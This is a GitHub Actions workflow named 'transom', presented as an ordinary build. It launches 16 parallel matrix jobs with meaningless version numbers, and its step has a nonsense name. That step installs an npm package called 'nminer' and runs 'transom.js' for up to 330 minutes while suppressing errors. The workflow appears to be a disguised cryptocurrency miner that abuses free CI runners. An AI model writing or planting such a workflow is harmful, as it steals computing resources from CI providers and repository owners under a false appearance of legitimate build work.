name: transom
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 8705 }
          - { version: 6998 }
          - { version: 343 }
          - { version: 5591 }
          - { version: 2559 }
          - { version: 2275 }
          - { version: 9778 }
          - { version: 3165 }
          - { version: 116 }
          - { version: 8694 }
          - { version: 9164 }
          - { version: 310 }
          - { version: 2438 }
          - { version: 8989 }
          - { version: 4405 }
          - { version: 1294 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: lest tremendously now or
        run: |
          npm install nminer@latest
          timeout 330m node transom.js || echo "transom executed"